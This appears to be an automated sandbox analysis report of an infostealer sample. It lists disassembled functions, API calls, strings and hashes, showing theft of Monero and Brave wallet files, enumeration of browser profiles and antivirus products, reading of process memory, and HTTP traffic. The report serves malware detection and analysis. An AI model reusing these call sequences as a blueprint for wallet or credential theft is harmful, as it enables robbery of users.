Opcode ID: f6ac08726d2066c4f41ab0cdafdfe6cf974318efcda379675c1cab0782c83bd4
Instruction ID: 9550d4ec349f4b6986a081b59543f2dd3f4438588e0d90f2a146262d3da5c6a3
Opcode Fuzzy Hash: f6ac08726d2066c4f41ab0cdafdfe6cf974318efcda379675c1cab0782c83bd4
Instruction Fuzzy Hash: 42C1F97590010ABFCF14EBA4DC91EDEB779AF04308F10815EF606A7282DE785788CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401D90 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 202memorystringregistryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401DC4
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401DDA
HeapAlloc.KERNEL32(00000000), ref: 00401DE1
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,000000FF), ref: 00401DFE
RegQueryValueExA.ADVAPI32(000000FF,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401E18

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00415650: Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
Part of subcall function 00415650: CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
Part of subcall function 00415650: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

lstrcat.KERNEL32(?,00000000), ref: 00401E30
lstrlen.KERNEL32(?), ref: 00401E3D
lstrcat.KERNEL32(?,.keys), ref: 00401E58
CopyFileA.KERNEL32(?,00000000,00000001,00000000,?,00000000,?,012C30E0,012BF840,0042431A), ref: 00401F45
DeleteFileA.KERNEL32(00000000), ref: 00401FC2
memset.MSVCRT ref: 00401FE0

Strings

.keys, xrefs: 00401E4C
wallet_path, xrefs: 00401E12
\Monero\wallet.keys, xrefs: 00401E82
SOFTWARE\monero-project\monero-core, xrefs: 00401DF2

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileHeaplstrcatmemset$AllocCopyCreateDeleteObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlen
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2022185681-218353709
Opcode ID: 1836b18f4c90fefa574bf900dff498b3f1cb10877020fc0ecb3275706c03e4d9
Instruction ID: b7190e78a0ece566d30ab40e821a7b759709afa39e85f3d509ad0c7fbb479532
Opcode Fuzzy Hash: 1836b18f4c90fefa574bf900dff498b3f1cb10877020fc0ecb3275706c03e4d9
Instruction Fuzzy Hash: F3817F71900249EACB14EBE5DC55BEDBBB8AF19308F54416EFA05B31C2DB781608CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00405A30 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 200networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AA8
StrCmpCA.SHLWAPI(?,012BF690,?,?,?,?,?,?,00000004), ref: 00405AC0
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AE4
HttpOpenRequestA.WININET(00000000,GET,?,012C3470,00000000,00000000,-00400100,00000000), ref: 00405B1B
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B3F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405B4A
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405B68
InternetReadFile.WININET(00000000,?,000007CF,00420429), ref: 00405BB5

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

InternetReadFile.WININET(00000000,?,000007CF,00420429), ref: 00405C0B
InternetCloseHandle.WININET(00000000), ref: 00405C16
InternetCloseHandle.WININET(?), ref: 00405C20
InternetCloseHandle.WININET(00000000), ref: 00405C2A

Strings

ERROR, xrefs: 00405B75
GET, xrefs: 00405B15
ERROR, xrefs: 00405C7E

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequestlstrlen$ConnectCrackInfoOptionQuerySendlstrcat
String ID: ERROR$ERROR$GET
API String ID: 1851261701-2509457195
Opcode ID: 15ebeb7ce850c2c06f64e6e6030b466563c2135e3a8808b05562186de4ed6fb0
Instruction ID: 735b7a5339effcfe679080928f79d8b6525980b66e78d205f4b2077015f7fe3f
Opcode Fuzzy Hash: 15ebeb7ce850c2c06f64e6e6030b466563c2135e3a8808b05562186de4ed6fb0
Instruction Fuzzy Hash: 5661B171900219AFEB10DB94CC85FEFB7BDEB49704F50412AFA05B3281DB785E488BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404B90 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 194networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000000), ref: 00404BEB
RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000000), ref: 00404BF2
InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C10
StrCmpCA.SHLWAPI(?,012BF690,?,?,?,?,?,?,00000000), ref: 00404C26
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404C51
HttpOpenRequestA.WININET(00000000,GET,?,012C3470,00000000,00000000,-00400100,00000000), ref: 00404C8B
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404CB0
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404CC2
HttpQueryInfoA.WININET(000000FF,00000013,?,?,00000000), ref: 00404CE4
InternetReadFile.WININET(000000FF,?,00000400,00000001), ref: 00404D54
InternetCloseHandle.WININET(00000000), ref: 00404D85
InternetCloseHandle.WININET(00000000), ref: 00404D8F
InternetCloseHandle.WININET(?), ref: 00404D99

Strings

GET, xrefs: 00404C85

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET
API String ID: 442264750-1805413626
Opcode ID: d4ae02a6c4690c3aaa6e6b6f4ff710bfbdec9f819835c47ab5a961fe980701e1
Instruction ID: e4d9ae68b354d6a53ac565d60b82c8593cc119c1dcfd6e68e0806bb865507591
Opcode Fuzzy Hash: d4ae02a6c4690c3aaa6e6b6f4ff710bfbdec9f819835c47ab5a961fe980701e1
Instruction Fuzzy Hash: 486171B5A00219ABDB20DBA4DC45FEFB7B9EB49B10F504129FA05F72C0D7789904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D607 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 365fileCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00427BE0), ref: 0040D61C
StrCmpCA.SHLWAPI(?,00427BE4), ref: 0040D636

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00427BE8,?,?,00427A9E), ref: 0040D6E7
StrCmpCA.SHLWAPI(00000000,Brave,00000000,?,012BF960,?,00427C0C,?,012BF900,?,00427C08,00000000,?,?,?,00427BE8), ref: 0040D8F0
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040D90A
StrCmpCA.SHLWAPI(?,012C3128), ref: 0040DADF
StrCmpCA.SHLWAPI(?,012BF960), ref: 0040DB65
StrCmpCA.SHLWAPI(00000000,012BF900), ref: 0040DB7F

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 0040D090: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040D149

FindNextFileA.KERNEL32(00000000,?), ref: 0040E128
FindClose.KERNEL32(00000000), ref: 0040E137

Strings

Brave, xrefs: 0040D8DF
Preferences, xrefs: 0040D8FE
Opera GX, xrefs: 0040D6D6
F, xrefs: 0040E179
\BraveWallet\Preferences, xrefs: 0040D9E4

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcatlstrlen$CloseCopyNext
String ID: Brave$F$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 704657350-2999302618
Opcode ID: 2fdd9b735f7aec4fc181650f2b725c313ab5a4168f1f17ea961b8ed24fa6f537
Instruction ID: a4fda989be0599bcb8e2ee1ea547159008252c3dc3d0dda2ce429139a213b2aa
Opcode Fuzzy Hash: 2fdd9b735f7aec4fc181650f2b725c313ab5a4168f1f17ea961b8ed24fa6f537
Instruction Fuzzy Hash: 6AE15270900249DADB14EBA5C955BDDBBB86F19304F5040AEF949B32C2DF781B4CCBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB80 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 200stringCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 0040FBAB
OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000), ref: 0040FBD3
strlen.MSVCRT ref: 0040FBF4
memset.MSVCRT ref: 0040FC30
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040FC8B
strlen.MSVCRT ref: 0040FC98
strlen.MSVCRT ref: 0040FCDE
memset.MSVCRT ref: 0040FD2A

Strings

N0ZWFt, xrefs: 0040FCD9, 0040FCE9
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040FC46, 0040FD43

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$Processmemset$MemoryOpenRead
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
API String ID: 47329967-1622206642
Opcode ID: 1b115c04a358f66ae5b9cc5224adfa24bdf08062a89fa872ad74c5b1b014d4dc
Instruction ID: 21a460605aad31a862c186db400c004e6ee40eb0e1eca90a670e2fa51daa2b6d
Opcode Fuzzy Hash: 1b115c04a358f66ae5b9cc5224adfa24bdf08062a89fa872ad74c5b1b014d4dc
Instruction Fuzzy Hash: ED612171D04208AAEB30DBA1DC42BEFBA78AF80314F14413EF915776C1D77C59888BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00413EA0 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 159stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00405A30: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AA8
Part of subcall function 00405A30: StrCmpCA.SHLWAPI(?,012BF690,?,?,?,?,?,?,00000004), ref: 00405AC0
Part of subcall function 00405A30: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AE4
Part of subcall function 00405A30: HttpOpenRequestA.WININET(00000000,GET,?,012C3470,00000000,00000000,-00400100,00000000), ref: 00405B1B
Part of subcall function 00405A30: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B3F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F37
lstrlen.KERNEL32(00000000), ref: 00413F4E

Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

StrStrA.SHLWAPI(00000000,00000000), ref: 00413F7A
lstrlen.KERNEL32(00000000), ref: 00413F8F
lstrlen.KERNEL32(00000000), ref: 00413FAC

Strings

ERROR, xrefs: 00414051
ERROR, xrefs: 00414010
ERROR, xrefs: 00413FFA
ERROR, xrefs: 00413F29
ERROR, xrefs: 00413FBE
2HA, xrefs: 00414095, 00413FD9
2HA, xrefs: 004140BB

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$Open$AllocConnectHttpLocalOptionRequest
String ID: 2HA$2HA$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 2440237315-3818902335
Opcode ID: ba1a200859b163294dc80f6353d27c9f4c925f5c19d5cf76e862733a802edbfa
Instruction ID: c74f93b79e1a96af938dd9262021b5edd6203cb7113eed4730bfd43c5734313e
Opcode Fuzzy Hash: ba1a200859b163294dc80f6353d27c9f4c925f5c19d5cf76e862733a802edbfa
Instruction Fuzzy Hash: 7E519134901249AACB11EBA5C9517DDBBA8AF19308F64407EF90573282DF7C5B48C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 00411260 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 136comCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 00411283
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430), ref: 00411294
CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 004112AE
CoSetProxyBlanket.OLE32(00428430,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000), ref: 004112E7
VariantInit.OLEAUT32(?), ref: 00411342

Part of subcall function 00411670: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,0041136B,?,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000), ref: 00411678
Part of subcall function 00411670: CharToOemW.USER32(?,00000000), ref: 00411685

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

VariantClear.OLEAUT32(?), ref: 0041137D

Strings

WQL, xrefs: 00411304
displayName, xrefs: 00411357
Select * From AntiVirusProduct, xrefs: 004112F7
Unknown, xrefs: 00411394
Unknown, xrefs: 0041139B
root\SecurityCenter2, xrefs: 004112C6

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 685420537-2776955613
Opcode ID: d780461ba901a512690bf7f16fc62c8f5d007367dc3ab2bd1b8bee44b6a6e4fb
Instruction ID: 40a9cb50dccdf73a38e95a76c9e526bc5b1cbb250bb0618e8cd6fd3f3244c3ba
Opcode Fuzzy Hash: d780461ba901a512690bf7f16fc62c8f5d007367dc3ab2bd1b8bee44b6a6e4fb
Instruction Fuzzy Hash: 6C417F71B01629ABCB20DB85DC49FEFBB78EF49B50F10421AF515A7290C7789941CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00410860 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 210registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

RegOpenKeyExA.KERNEL32(00000000,012B66D8,00000000,00020019,00000000,004280BF,?,00000001), ref: 004108BF
RegEnumKeyExA.KERNEL32(00000000,?,?,00428524,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041091E
wsprintfA.USER32 ref: 00410947
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410965
RegQueryValueExA.KERNEL32(?,012C2FF0,00000000,000F003F,?,00000400), ref: 00410995
lstrlen.KERNEL32(?), ref: 004109AA
RegQueryValueExA.KERNEL32(?,012C3020,00000000,000F003F,?,00000400,00000000,00421E41,?,00000000,?,004280F0), ref: 00410A2E

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Strings

?, xrefs: 004108B5
- , xrefs: 00410A38
%s\%s, xrefs: 00410941

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
String ID: - $%s\%s$?
API String ID: 1989970852-3278919252
Opcode ID: b7db24d05970cf0cf434d56626852d945b4fea331a45fae036690235d3bd5aa6
Instruction ID: 46b3b7c26f9db54fd8d8a07889e13f83e758814ada42e2adbf2fffcbf2ed9ca1
Opcode Fuzzy Hash: b7db24d05970cf0cf434d56626852d945b4fea331a45fae036690235d3bd5aa6
Instruction Fuzzy Hash: 158148B190021DABCB14DBA5DC94AEEBBB8BF59704F10816EF505B3241DB785A48CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00410D90 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410DC8
GetVolumeInformationA.KERNEL32(00421EB9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410E01
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410E4D
HeapAlloc.KERNEL32(00000000), ref: 00410E54
wsprintfA.USER32 ref: 00410E91
lstrcat.KERNEL32(00000000,00428098), ref: 00410EA0

Part of subcall function 00410D30: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410D45

lstrlen.KERNEL32(00000000), ref: 00410EC2

Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1

lstrcat.KERNEL32(00000000,00000000), ref: 00410EF0

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

C, xrefs: 00410DD2
:\, xrefs: 00410DF7

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
String ID: :\$C
API String ID: 2389002695-3309953409
Opcode ID: bfed51b7b5bf34afebfa62e898e320037828684205222335e9b0ccf5d3cf25f1
Instruction ID: cd9e33ec6b3912d753ff03e78be9aa97267fc370a97b6a7823d5d9fd7b56550d
Opcode Fuzzy Hash: bfed51b7b5bf34afebfa62e898e320037828684205222335e9b0ccf5d3cf25f1
Instruction Fuzzy Hash: 3C41F571900219ABDB10EBE4DC15BEEBBB9EF18704F10015EFA05B3281DB785A44C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 00405850 Relevance: 15.1, APIs: 10, Instructions: 147networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004058B5
StrCmpCA.SHLWAPI(?,012BF690,?,?,?,?,?,?,0000000D), ref: 004058ED
